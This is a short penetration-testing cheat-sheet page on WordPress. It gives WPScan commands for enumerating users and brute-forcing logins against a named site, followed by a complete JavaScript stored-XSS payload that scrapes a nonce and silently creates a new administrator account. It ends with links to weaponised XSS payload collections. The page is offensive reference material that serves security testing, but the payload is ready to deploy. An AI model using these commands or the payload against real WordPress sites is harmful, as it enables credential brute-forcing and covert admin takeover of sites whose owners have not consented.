Wordpress

WPScan

# Default enumeration
wpscan --url https://parzival.sh/ 

# Enumerate usernames
wpscan --url https://parzival.sh/ -e u 

# Bruteforce Wordpress
wpscan --url https://parzival.sh/ -U $usernamelist -P $passwordlist

GitHub - wpscanteam/wpscan: WPScan WordPress security scanner. Written for security professionals and blog maintainers to test the security of their WordPress websites. Contact us via [email protected]GitHub

Turning XSS to RCE

When identifying a Wordpress site that is vulnerable to cross-site scripting, there are some well documented payloads and resources out there which increase the severity if an Administrator were to trigger the payload. For example, if a stored cross-site scripting vulnerability affects a plugin. The following is a snippet of a Hakluke payload linked below which attempts to create a new administrator user:

var wp_root = "" // don't add a trailing slash
var req = new XMLHttpRequest();
var url = wp_root + "/wp-admin/user-new.php";
var regex = /ser" value="([^"]*?)"/g;
req.open("GET", url, false);
req.send();
var nonce = regex.exec(req.responseText);
var nonce = nonce[1];
var params = "action=createuser&_wpnonce_create-user="+nonce+"&user_login=hacker&[email protected]&pass1=AttackerP455&pass2=AttackerP455&role=administrator";
req.open("POST", url, true);
req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
req.send(params);

XSS to RCE – using WordPress as an examplei break software - My work with different software, bug hunting and interesting tidbits

How to craft an XSS payload to create an admin user in Wordpress - Toronto Web Design and Development | Shift8 WebToronto Web Design and Development | Shift8 Web

GitHub - hakluke/weaponised-XSS-payloads: XSS payloads designed to turn alert(1) into P1GitHub

PreviousDrupal NextExchange

Last updated 2 years ago